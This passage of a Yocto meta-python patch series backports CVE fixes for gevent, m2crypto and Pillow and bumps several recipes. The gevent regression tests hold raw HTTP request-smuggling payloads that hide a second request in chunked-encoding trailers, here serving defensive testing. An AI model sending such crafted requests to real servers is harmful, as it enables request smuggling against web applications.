def application(self, env, start_response): ++ self.calls += 1 + self.assertTrue(env.get('wsgi.input_terminated')) + start_response('200 OK', [('Content-Type', 'text/plain')]) + if env['PATH_INFO'] == '/a': +@@ -730,6 +731,8 @@ class TestChunkedPost(TestCase): + if env['PATH_INFO'] == '/c': + return list(iter(lambda: env['wsgi.input'].read(1), b'')) + ++ return [b'We should not get here', env['PATH_INFO'].encode('ascii')] ++ + def test_014_chunked_post(self): + data = (b'POST /a HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n' + b'Transfer-Encoding: chunked\r\n\r\n' +@@ -797,6 +800,170 @@ class TestChunkedPost(TestCase): + fd.write(data) + read_http(fd, code=400) + ++ def test_trailers_keepalive_ignored(self): ++ # Trailers after a chunk are ignored. ++ data = ( ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: keep-alive\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n hai\r\n' ++ b'0\r\n' # last-chunk ++ # Normally the final CRLF would go here, but if you put in a ++ # trailer, it doesn't. ++ b'trailer1: value1\r\n' ++ b'trailer2: value2\r\n' ++ b'\r\n' # Really terminate the chunk. ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: close\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n bye\r\n' ++ b'0\r\n' # last-chunk ++ ) ++ with self.makefile() as fd: ++ fd.write(data) ++ read_http(fd, body='oh hai') ++ read_http(fd, body='oh bye') ++ ++ self.assertEqual(self.calls, 2) ++ ++ def test_trailers_too_long(self): ++ # Trailers after a chunk are ignored. ++ data = ( ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: keep-alive\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n hai\r\n' ++ b'0\r\n' # last-chunk ++ # Normally the final CRLF would go here, but if you put in a ++ # trailer, it doesn't. ++ b'trailer2: value2' # not lack of \r\n ++ ) ++ data += b't' * pywsgi.MAX_REQUEST_LINE ++ # No termination, because we detect the trailer as being too ++ # long and abort the connection. ++ with self.makefile() as fd: ++ fd.write(data) ++ read_http(fd, body='oh hai') ++ with self.assertRaises(ConnectionClosed): ++ read_http(fd, body='oh bye') ++ ++ def test_trailers_request_smuggling_missing_last_chunk_keep_alive(self): ++ # When something that looks like a request line comes in the trailer ++ # as the first line, immediately after an invalid last chunk. ++ # We detect this and abort the connection, because the ++ # whitespace in the GET line isn't a legal part of a trailer. ++ # If we didn't abort the connection, then, because we specified ++ # keep-alive, the server would be hanging around waiting for more input. ++ data = ( ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: keep-alive\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n hai\r\n' ++ b'0' # last-chunk, but missing the \r\n ++ # Normally the final CRLF would go here, but if you put in a ++ # trailer, it doesn't. ++ # b'\r\n' ++ b'GET /path2?a=:123 HTTP/1.1\r\n' ++ b'Host: a.com\r\n' ++ b'Connection: close\r\n' ++ b'\r\n' ++ ) ++ with self.makefile() as fd: ++ fd.write(data) ++ read_http(fd, body='oh hai') ++ with self.assertRaises(ConnectionClosed): ++ read_http(fd) ++ ++ self.assertEqual(self.calls, 1) ++ ++ def test_trailers_request_smuggling_missing_last_chunk_close(self): ++ # Same as the above, except the trailers are actually valid ++ # and since we ask to close the connection we don't get stuck ++ # waiting for more input. ++ data = ( ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: close\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n hai\r\n' ++ b'0\r\n' # last-chunk ++ # Normally the final CRLF would go here, but if you put in a ++ # trailer, it doesn't. ++ # b'\r\n' ++ b'GETpath2a:123 HTTP/1.1\r\n' ++ b'Host: a.com\r\n' ++ b'Connection: close\r\n' ++ b'\r\n' ++ ) ++ with self.makefile() as fd: ++ fd.write(data) ++ read_http(fd, body='oh hai') ++ with self.assertRaises(ConnectionClosed): ++ read_http(fd) ++ ++ def test_trailers_request_smuggling_header_first(self): ++ # When something that looks like a header comes in the first line. ++ data = ( ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: keep-alive\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n hai\r\n' ++ b'0\r\n' # last-chunk, but only one CRLF ++ b'Header: value\r\n' ++ b'GET /path2?a=:123 HTTP/1.1\r\n' ++ b'Host: a.com\r\n' ++ b'Connection: close\r\n' ++ b'\r\n' ++ ) ++ with self.makefile() as fd: ++ fd.write(data) ++ read_http(fd, body='oh hai') ++ with self.assertRaises(ConnectionClosed): ++ read_http(fd, code=400) ++ ++ self.assertEqual(self.calls, 1) ++ ++ def test_trailers_request_smuggling_request_terminates_then_header(self): ++ data = ( ++ b'POST /a HTTP/1.1\r\n' ++ b'Host: localhost\r\n' ++ b'Connection: keep-alive\r\n' ++ b'Transfer-Encoding: chunked\r\n' ++ b'\r\n' ++ b'2\r\noh\r\n' ++ b'4\r\n hai\r\n' ++ b'0\r\n' # last-chunk ++ b'\r\n' ++ b'Header: value' ++ b'GET /path2?a=:123 HTTP/1.1\r\n' ++ b'Host: a.com\r\n' ++ b'Connection: close\r\n' ++ b'\r\n' ++ ) ++ with self.makefile() as fd: ++ fd.write(data) ++ read_http(fd, body='oh hai') ++ read_http(fd, code=400) ++ ++ self.assertEqual(self.calls, 1) ++ + + class TestUseWrite(TestCase): + +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb b/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb index 9efeec4d9f..fd6b0f531a 100644 --- a/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb +++ b/meta-python/recipes-devtools/python/python3-gevent_21.12.0.bb @@ -13,6 +13,8 @@ RDEPENDS:${PN} = "${PYTHON_PN}-greenlet \ SRC_URI[sha256sum] = "f48b64578c367b91fa793bf8eaaaf4995cb93c8bc45860e473bf868070ad094e" +SRC_URI += "file://CVE-2023-41419.patch" + inherit pypi setuptools3 # Don't embed libraries, link to the system instead diff --git a/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb b/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb index 684bca03e1..b02c55a85b 100644 --- a/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb +++ b/meta-python/recipes-devtools/python/python3-kivy_2.1.0..bb @@ -43,7 +43,9 @@ export KIVY_GRAPHICS KIVY_CROSS_SYSROOT="${RECIPE_SYSROOT}" export KIVY_CROSS_SYSROOT -REQUIRED_DISTRO_FEATURES += "x11 opengl" +REQUIRED_DISTRO_FEATURES += "opengl gobject-introspection-data" + +ANY_OF_DISTRO_FEATURES = "x11 wayland" DEPENDS += " \ gstreamer1.0 \ diff --git a/meta-python/recipes-devtools/python/python3-m2crypto/CVE-2020-25657.patch b/meta-python/recipes-devtools/python/python3-m2crypto/CVE-2020-25657.patch new file mode 100644 index 0000000000..cc915f1478 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-m2crypto/CVE-2020-25657.patch @@ -0,0 +1,175 @@ +From 2fa92e048b76fcc7bf2d4f4443478c8292d17470 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Mat=C4=9Bj=20Cepl?= <mcepl@cepl.eu> +Date: Thu, 1 Jun 2023 14:56:34 +0000 +Subject: [PATCH] Mitigate the Bleichenbacher timing attacks in the RSA + decryption API (CVE-2020-25657) + +Fixes #282 + +CVE: CVE-2020-25657 + +Upstream-Status: Backport [https://gitlab.com/m2crypto/m2crypto/-/commit/84c53958def0f510e92119fca14d74f94215827a] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + src/SWIG/_m2crypto_wrap.c | 20 ++++++++++++-------- + src/SWIG/_rsa.i | 20 ++++++++++++-------- + tests/test_rsa.py | 15 +++++++-------- + 3 files changed, 31 insertions(+), 24 deletions(-) + +diff --git a/src/SWIG/_m2crypto_wrap.c b/src/SWIG/_m2crypto_wrap.c +index 3db88b9..6aafe1f 100644 +--- a/src/SWIG/_m2crypto_wrap.c ++++ b/src/SWIG/_m2crypto_wrap.c +@@ -7129,9 +7129,10 @@ PyObject *rsa_private_encrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_private_encrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); +@@ -7159,9 +7160,10 @@ PyObject *rsa_public_decrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_public_decrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); +@@ -7186,9 +7188,10 @@ PyObject *rsa_public_encrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_public_encrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); +@@ -7213,9 +7216,10 @@ PyObject *rsa_private_decrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_private_decrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); + +diff --git a/src/SWIG/_rsa.i b/src/SWIG/_rsa.i +index bc714e0..1377b8b 100644 +--- a/src/SWIG/_rsa.i ++++ b/src/SWIG/_rsa.i +@@ -239,9 +239,10 @@ PyObject *rsa_private_encrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_private_encrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); +@@ -269,9 +270,10 @@ PyObject *rsa_public_decrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_public_decrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); +@@ -296,9 +298,10 @@ PyObject *rsa_public_encrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_public_encrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); +@@ -323,9 +326,10 @@ PyObject *rsa_private_decrypt(RSA *rsa, PyObject *from, int padding) { + tlen = RSA_private_decrypt(flen, (unsigned char *)fbuf, + (unsigned char *)tbuf, rsa, padding); + if (tlen == -1) { +- m2_PyErr_Msg(_rsa_err); ++ ERR_clear_error(); ++ PyErr_Clear(); + PyMem_Free(tbuf); +- return NULL; ++ Py_RETURN_NONE; + } + ret = PyBytes_FromStringAndSize((const char *)tbuf, tlen); + +diff --git a/tests/test_rsa.py b/tests/test_rsa.py +index 7bb3af7..5e75d68 100644 +--- a/tests/test_rsa.py ++++ b/tests/test_rsa.py +@@ -109,8 +109,9 @@ class RSATestCase(unittest.TestCase): + # The other paddings. + for padding in self.s_padding_nok: + p = getattr(RSA, padding) +- with self.assertRaises(RSA.RSAError): +- priv.private_encrypt(self.data, p) ++ # Exception disabled as a part of mitigation against CVE-2020-25657 ++ # with self.assertRaises(RSA.RSAError): ++ priv.private_encrypt(self.data, p) + # Type-check the data to be encrypted. + with self.assertRaises(TypeError): + priv.private_encrypt(self.gen_callback, RSA.pkcs1_padding) +@@ -127,10 +128,12 @@ class RSATestCase(unittest.TestCase): + self.assertEqual(ptxt, self.data) + + # no_padding +- with six.assertRaisesRegex(self, RSA.RSAError, 'data too small'): +- priv.public_encrypt(self.data, RSA.no_padding) ++ # Exception disabled as a part of mitigation against CVE-2020-25657 ++ # with six.assertRaisesRegex(self, RSA.RSAError, 'data too small'): ++ priv.public_encrypt(self.data, RSA.no_padding) + + # Type-check the data to be encrypted. ++ # Exception disabled as a part of mitigation against CVE-2020-25657 + with self.assertRaises(TypeError): + priv.public_encrypt(self.gen_callback, RSA.pkcs1_padding) + +@@ -146,10 +149,6 @@ class RSATestCase(unittest.TestCase): + b'\000\000\000\003\001\000\001') # aka 65537 aka 0xf4 + with self.assertRaises(RSA.RSAError): + setattr(rsa, 'e', '\000\000\000\003\001\000\001') +- with self.assertRaises(RSA.RSAError): +- rsa.private_encrypt(1) +- with self.assertRaises(RSA.RSAError): +- rsa.private_decrypt(1) + assert rsa.check_key() + + def test_loadpub_bad(self): +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb b/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb index 51a0dd676e..155a9066ca 100644 --- a/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb +++ b/meta-python/recipes-devtools/python/python3-m2crypto_0.38.0.bb @@ -10,6 +10,7 @@ SRC_URI += "file://0001-setup.py-link-in-sysroot-not-in-host-directories.patch \ file://cross-compile-platform.patch \ file://avoid-host-contamination.patch \ file://0001-setup.py-address-openssl-3.x-build-issue.patch \ + file://CVE-2020-25657.patch \ " SRC_URI[sha256sum] = "99f2260a30901c949a8dc6d5f82cd5312ffb8abc92e76633baf231bbbcb2decb" diff --git a/meta-python/recipes-devtools/python/python3-oauthlib_3.2.0.bb b/meta-python/recipes-devtools/python/python3-oauthlib_3.2.2.bb index e7f7f0b47b..566279d71c 100644 --- a/meta-python/recipes-devtools/python/python3-oauthlib_3.2.0.bb +++ b/meta-python/recipes-devtools/python/python3-oauthlib_3.2.2.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/idan/oauthlib" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=abd2675e944a2011aed7e505290ba482" -SRC_URI[sha256sum] = "23a8208d75b902797ea29fd31fa80a15ed9dc2c6c16fe73f5d346f83f6fa27a2" +SRC_URI[sha256sum] = "9859c40929662bec5d64f34d01c99e093149682a3f38915dc0655d5a633dd918" inherit pypi setuptools3 diff --git a/meta-python/recipes-devtools/python/python3-pillow/CVE-2023-44271.patch b/meta-python/recipes-devtools/python/python3-pillow/CVE-2023-44271.patch new file mode 100644 index 0000000000..ad51f17288 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-pillow/CVE-2023-44271.patch @@ -0,0 +1,156 @@ +From 1fe1bb49c452b0318cad12ea9d97c3bef188e9a7 Mon Sep 17 00:00:00 2001 +From: Andrew Murray <radarhere@users.noreply.github.com> +Date: Fri, 30 Jun 2023 23:32:26 +1000 +Subject: [PATCH] Added ImageFont.MAX_STRING_LENGTH + +Upstream-status: Backport [https://github.com/python-pillow/Pillow/commit/1fe1bb49c452b0318cad12ea9d97c3bef188e9a7] +CVE: CVE-2023-44271 +Comment: Refresh hunk for test_imagefont.py, ImageFont.py and +Remove hunk 10.0.0.rst because in our version it is 9.4.0 + +Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com> +Signed-off-by: Dnyandev Padalkar <padalkards17082001@gmail.com> +--- + Tests/test_imagefont.py | 19 +++++++++++++++++++ + docs/reference/ImageFont.rst | 18 ++++++++++++++++++ + src/PIL/ImageFont.py | 15 +++++++++++++++ + 3 files changed, 52 insertions(+) + +diff --git a/Tests/test_imagefont.py b/Tests/test_imagefont.py +index 7fa8ff8cbfd..c50447a153d 100644 +--- a/Tests/test_imagefont.py ++++ b/Tests/test_imagefont.py +@@ -1107,6 +1107,25 @@ + assert_image_equal_tofile(im, "Tests/images/text_mono.gif") + + ++def test_too_many_characters(font): ++ with pytest.raises(ValueError): ++ font.getlength("A" * 1000001) ++ with pytest.raises(ValueError): ++ font.getbbox("A" * 1000001) ++ with pytest.raises(ValueError): ++ font.getmask2("A" * 1000001) ++ ++ transposed_font = ImageFont.TransposedFont(font) ++ with pytest.raises(ValueError): ++ transposed_font.getlength("A" * 1000001) ++ ++ default_font = ImageFont.load_default() ++ with pytest.raises(ValueError): ++ default_font.getlength("A" * 1000001) ++ with pytest.raises(ValueError): ++ default_font.getbbox("A" * 1000001) ++ ++ + @pytest.mark.parametrize( + "test_file", + [ +diff --git a/docs/reference/ImageFont.rst b/docs/reference/ImageFont.rst +index 946bd3c4bed..2abfa0cc997 100644 +--- a/docs/reference/ImageFont.rst ++++ b/docs/reference/ImageFont.rst +@@ -18,6 +18,15 @@ OpenType fonts (as well as other font formats supported by the FreeType + library). For earlier versions, TrueType support is only available as part of + the imToolkit package. + ++.. warning:: ++ To protect against potential DOS attacks when using arbitrary strings as ++ text input, Pillow will raise a ``ValueError`` if the number of characters ++ is over a certain limit, :py:data:`MAX_STRING_LENGTH`. ++ ++ This threshold can be changed by setting ++ :py:data:`MAX_STRING_LENGTH`. It can be disabled by setting ++ ``ImageFont.MAX_STRING_LENGTH = None``. ++ + Example + ------- + +@@ -73,3 +82,12 @@ Constants + + Requires Raqm, you can check support using + :py:func:`PIL.features.check_feature` with ``feature="raqm"``. ++ ++Constants ++--------- ++ ++.. data:: MAX_STRING_LENGTH ++ ++ Set to 1,000,000, to protect against potential DOS attacks. Pillow will ++ raise a ``ValueError`` if the number of characters is over this limit. The ++ check can be disabled by setting ``ImageFont.MAX_STRING_LENGTH = None``. +diff --git a/src/PIL/ImageFont.py b/src/PIL/ImageFont.py +index 3ddc1aaad64..1030985ebc4 100644 +--- a/src/PIL/ImageFont.py ++++ b/src/PIL/ImageFont.py +@@ -43,6 +43,9 @@ + RAQM = 1 + + ++MAX_STRING_LENGTH = 1000000 ++ ++ + def __getattr__(name): + for enum, prefix in {Layout: "LAYOUT_"}.items(): + if name.startswith(prefix): +@@ -67,6 +67,12 @@ + core = _ImagingFtNotInstalled() + + ++def _string_length_check(text): ++ if MAX_STRING_LENGTH is not None and len(text) > MAX_STRING_LENGTH: ++ msg = "too many characters in string" ++ raise ValueError(msg) ++ ++ + _UNSPECIFIED = object() + + +@@ -192,6 +192,7 @@ + + :return: ``(left, top, right, bottom)`` bounding box + """ ++ _string_length_check(text) + width, height = self.font.getsize(text) + return 0, 0, width, height + +@@ -202,6 +202,7 @@ + + .. versionadded:: 9.2.0 + """ ++ _string_length_check(text) + width, height = self.font.getsize(text) + return width + +@@ -359,6 +359,7 @@ + + :return: Width for horizontal, height for vertical text. + """ ++ _string_length_check(text) + return self.font.getlength(text, mode, direction, features, language) / 64 + + def getbbox( +@@ -418,6 +418,7 @@ + + :return: ``(left, top, right, bottom)`` bounding box + """ ++ _string_length_check(text) + size, offset = self.font.getsize( + text, mode, direction, features, language, anchor + ) +@@ -762,6 +762,7 @@ + :py:mod:`PIL.Image.core` interface module, and the text offset, the + gap between the starting coordinate and the first marking + """ ++ _string_length_check(text) + if fill is _UNSPECIFIED: + fill = Image.core.fill + else: +@@ -924,6 +924,7 @@ + if self.orientation in (Image.Transpose.ROTATE_90, Image.Transpose.ROTATE_270): + msg = "text length is undefined for text rotated by 90 or 270 degrees" + raise ValueError(msg) ++ _string_length_check(text) + return self.font.getlength(text, *args, **kwargs) + + diff --git a/meta-python/recipes-devtools/python/python3-pillow/run-ptest b/meta-python/recipes-devtools/python/python3-pillow/run-ptest new file mode 100644 index 0000000000..3385d68939 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-pillow/run-ptest @@ -0,0 +1,3 @@ +#!/bin/sh + +pytest -o log_cli=true -o log_cli_level=INFO | sed -e 's/\[...%\]//g'| sed -e 's/PASSED/PASS/g'| sed -e 's/FAILED/FAIL/g'|sed -e 's/SKIPED/SKIP/g'| awk '{if ($NF=="PASS" || $NF=="FAIL" || $NF=="SKIP" || $NF=="XFAIL" || $NF=="XPASS"){printf "%s: %s\n", $NF, $0}else{print}}'| awk '{if ($NF=="PASS" || $NF=="FAIL" || $NF=="SKIP" || $NF=="XFAIL" || $NF=="XPASS") {$NF="";print $0}else{print}}' diff --git a/meta-python/recipes-devtools/python/python3-pillow_9.0.1.bb b/meta-python/recipes-devtools/python/python3-pillow_9.0.1.bb deleted file mode 100644 index fb86322f77..0000000000 --- a/meta-python/recipes-devtools/python/python3-pillow_9.0.1.bb +++ /dev/null @@ -1,42 +0,0 @@ -SUMMARY = "Python Imaging Library (Fork). Pillow is the friendly PIL fork by Alex \ -Clark and Contributors. PIL is the Python Imaging Library by Fredrik Lundh and \ -Contributors." -HOMEPAGE = "https://pillow.readthedocs.io" -LICENSE = "MIT" -LIC_FILES_CHKSUM = "file://LICENSE;md5=ad081a0aede51e89f8da13333a8fb849" - -SRC_URI = "git://github.com/python-pillow/Pillow.git;branch=9.0.x;protocol=https \ - file://0001-support-cross-compiling.patch \ - file://0001-explicitly-set-compile-options.patch \ -" -SRCREV ?= "82541b6dec8452cb612067fcebba1c5a1a2bfdc8" - -inherit setuptools3 - -PIP_INSTALL_PACKAGE = "Pillow" -PIP_INSTALL_DIST_PATH = "${S}/dist" - -DEPENDS += " \ - zlib \ - jpeg \ - tiff \ - freetype \ - lcms \ - openjpeg \ -" - -RDEPENDS:${PN} += " \ - ${PYTHON_PN}-misc \ - ${PYTHON_PN}-logging \ - ${PYTHON_PN}-numbers \ -" - -CVE_PRODUCT = "pillow" - -S = "${WORKDIR}/git" - -RPROVIDES:${PN} += "python3-imaging" - -BBCLASSEXTEND = "native" - -SRCREV = "6deac9e3a23caffbfdd75c00d3f0a1cd36cdbd5d" diff --git a/meta-python/recipes-devtools/python/python3-pillow_9.4.0.bb b/meta-python/recipes-devtools/python/python3-pillow_9.4.0.bb new file mode 100644 index 0000000000..b9c09127c5 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-pillow_9.4.0.bb @@ -0,0 +1,65 @@ +SUMMARY = "Python Imaging Library (Fork). Pillow is the friendly PIL fork by Alex \ +Clark and Contributors. PIL is the Python Imaging Library by Fredrik Lundh and \ +Contributors." +HOMEPAGE = "https://pillow.readthedocs.io" +LICENSE = "MIT" +LIC_FILES_CHKSUM = "file://LICENSE;md5=bc416d18f294943285560364be7cbec1" + +SRC_URI = "git://github.com/python-pillow/Pillow.git;branch=main;protocol=https \ + file://0001-support-cross-compiling.patch \ + file://0001-explicitly-set-compile-options.patch \ + file://run-ptest \ + file://CVE-2023-44271.patch \ + " +SRCREV ?= "82541b6dec8452cb612067fcebba1c5a1a2bfdc8" + +inherit setuptools3 ptest + +PIP_INSTALL_PACKAGE = "Pillow" +PIP_INSTALL_DIST_PATH = "${S}/dist" + +DEPENDS += " \ + zlib \ + jpeg \ + tiff \ + freetype \ + lcms \ + openjpeg \ +" + +RDEPENDS:${PN} += " \ + ${PYTHON_PN}-misc \ + ${PYTHON_PN}-logging \ + ${PYTHON_PN}-numbers \ +" + +RDEPENDS:${PN}-ptest += " \ + bash \ + ghostscript \ + jpeg-tools \ + libwebp \ + ${PYTHON_PN}-core \ + ${PYTHON_PN}-distutils \ + ${PYTHON_PN}-image \ + ${PYTHON_PN}-mmap \ + ${PYTHON_PN}-pytest \ + ${PYTHON_PN}-pytest-timeout \ + ${PYTHON_PN}-resource \ + ${PYTHON_PN}-unixadmin\ + ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'tk', '', d)} \ +" + +CVE_PRODUCT = "pillow" + +S = "${WORKDIR}/git" + +RPROVIDES:${PN} += "python3-imaging" + +do_install_ptest() { + install -d ${D}${PTEST_PATH}/Tests + cp -rf ${S}/Tests ${D}${PTEST_PATH}/ +} + +BBCLASSEXTEND = "native" + +SRCREV = "a5bbab1c1e63b439de191ef2040173713b26d2da" diff --git a/meta-python/recipes-devtools/python/python3-protobuf_3.20.0.bb b/meta-python/recipes-devtools/python/python3-protobuf_3.20.3.bb index 5c4de4ac2b..76b48e1ffc 100644 --- a/meta-python/recipes-devtools/python/python3-protobuf_3.20.0.bb +++ b/meta-python/recipes-devtools/python/python3-protobuf_3.20.3.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://PKG-INFO;beginline=8;endline=8;md5=53dbfa56f61b90215a inherit pypi setuptools3 -SRC_URI[sha256sum] = "71b2c3d1cd26ed1ec7c8196834143258b2ad7f444efff26fdc366c6f5e752702" +SRC_URI[sha256sum] = "2e3427429c9cffebf259491be0af70189607f365c2f41c7c3764af6f337105f2" # http://errors.yoctoproject.org/Errors/Details/184715/ # Can't find required file: ../src/google/protobuf/descriptor.proto diff --git a/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb b/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb index 4c4c959eba..035e149518 100644 --- a/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb +++ b/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb @@ -21,4 +21,4 @@ RDEPENDS:${PN} = "\ libudev \ " -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-python/recipes-devtools/python/python3-requests-toolbelt/0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch b/meta-python/recipes-devtools/python/python3-requests-toolbelt/0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch new file mode 100644 index 0000000000..baa833b6d2 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-requests-toolbelt/0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch @@ -0,0 +1,41 @@ +From 7188b06330e5260be20bce8cbcf0d5ae44e34eaf Mon Sep 17 00:00:00 2001 +From: Jon Dufresne <jon.dufresne@gmail.com> +Date: Fri, 1 Feb 2019 16:30:01 -0800 +Subject: [PATCH] Fix collections.abc deprecation warning in downloadutils + +Warning appears as: + +tests/test_downloadutils.py::test_stream_response_to_specific_filename + requests_toolbelt/downloadutils/stream.py:161: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working + if path and isinstance(getattr(path, 'write', None), collections.Callable): + +Upstream-Status: Backport [https://github.com/requests/toolbelt/commit/7188b06330e5260be20bce8cbcf0d5ae44e34eaf] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + requests_toolbelt/downloadutils/stream.py | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/requests_toolbelt/downloadutils/stream.py b/requests_toolbelt/downloadutils/stream.py +index eed60a7..1d1c31b 100644 +--- a/requests_toolbelt/downloadutils/stream.py ++++ b/requests_toolbelt/downloadutils/stream.py +@@ -1,6 +1,5 @@ + # -*- coding: utf-8 -*- + """Utilities for dealing with streamed requests.""" +-import collections + import os.path + import re + +@@ -158,7 +157,7 @@ def stream_response_to_file(response, path=None, chunksize=_DEFAULT_CHUNKSIZE): + pre_opened = False + fd = None + filename = None +- if path and isinstance(getattr(path, 'write', None), collections.Callable): ++ if path and callable(getattr(path, 'write', None)): + pre_opened = True + fd = path + filename = getattr(fd, 'name', None) +-- +2.25.1 + diff --git a/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb b/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb index 366f41ca81..72ad7a6180 100644 --- a/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb +++ b/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb @@ -6,7 +6,8 @@ LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=71760e0f1dda8cff91b0bc9246caf571" SRC_URI = "file://run-ptest \ - " + file://0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch \ + " SRC_URI[md5sum] = "b1509735c4b4cf95df2619facbc3672e" SRC_URI[sha256sum] = "968089d4584ad4ad7c171454f0a5c6dac23971e9472521ea3b6d49d610aa6fc0" @@ -31,4 +32,4 @@ do_install_ptest() { # remove test test_multipart_encoder.py as it fails, # downloaded file is not supported rm -f ${D}${PTEST_PATH}/tests/test_multipart_encoder.py -} +} diff --git a/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb b/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb index d9465af081..ecc15499cf 100644 --- a/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb +++ b/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb @@ -16,5 +16,3 @@ RDEPENDS:${PN} += " \ 